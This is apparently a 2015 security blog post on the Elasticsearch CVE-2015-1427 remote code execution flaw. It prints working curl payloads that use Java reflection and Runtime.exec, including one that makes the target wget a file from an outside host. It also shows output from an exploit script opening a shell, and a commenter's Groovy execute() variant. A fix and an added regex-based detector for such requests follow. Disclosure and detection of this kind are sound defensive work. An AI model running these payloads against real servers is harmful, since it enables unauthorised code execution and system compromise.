Wednesday, March 11, 2015

ElasticSearch CVE-2015-1427 RCE Exploit


References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is already out here [XiphosResearch github], here [in a comment :-)] and here [Metasploit pull request]

PoCs:

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix, disable Groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+:


script.groovy.sandbox.enabled: false
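
For hosts that cannot be patched right away, search request bodies captured at a proxy or in request logs can be triaged for the script patterns shown on this page. The following is an added example, not code from the original post or from Elasticsearch; the indicator list, function names and sample bodies are constructed here, and it only looks at string-valued "script" keys.

```python
import json
import re

# Indicators taken from the payloads shown on this page: Java reflection used
# to reach classes outside the sandbox, and Groovy's .execute() on a list/string.
INDICATORS = {
    "reflection": re.compile(r"\.class\b|\bforName\s*\(|\bgetClass\s*\("),
    "runtime_exec": re.compile(r"\bgetRuntime\s*\(|\bProcessBuilder\b"),
    "groovy_execute": re.compile(r"\.\s*execute\s*\("),
}

def iter_scripts(node, path=""):
    """Yield (json_path, script_text) for every string-valued "script" key."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from iter_scripts(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from iter_scripts(item, f"{path}[{i}]")

def inspect_search_body(body):
    """Return a list of (json_path, indicator_name) hits for one request body."""
    try:
        scripts = list(iter_scripts(json.loads(body)))
    except ValueError:
        # Unparseable body: fall back to scanning the raw text.
        scripts = [("<raw>", body)]
    return [(path, name)
            for path, text in scripts
            for name, rx in INDICATORS.items() if rx.search(text)]

# Constructed sample bodies: the first two mirror payloads on this page, the last is benign.
SAMPLES = [
    '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")"}}}',
    '{"script_fields": {"result": {"script": "[\'ls\',\'/\'].execute().text", "lang": "groovy"}}}',
    '{"script_fields": {"total": {"script": "doc[\\"price\\"].value * 2"}}}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_search_body(body) or "clean")
```

The patterns are a triage heuristic and can be evaded or produce false positives on legitimate scripts; the configuration change and upgrade above remain the fix.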

1 comment:

  1. Thanks to Groovy scripting being enabled by default on recent versions, it's easier to execute:
    ...
    "script_fields": {
    "result": {
    "script" : "['ls','/'].execute().text",
    "lang": "groovy"
    }
    }
    ....

    Specifying the "lang" parameter makes this exploit work on any version (old versions use mvel by default)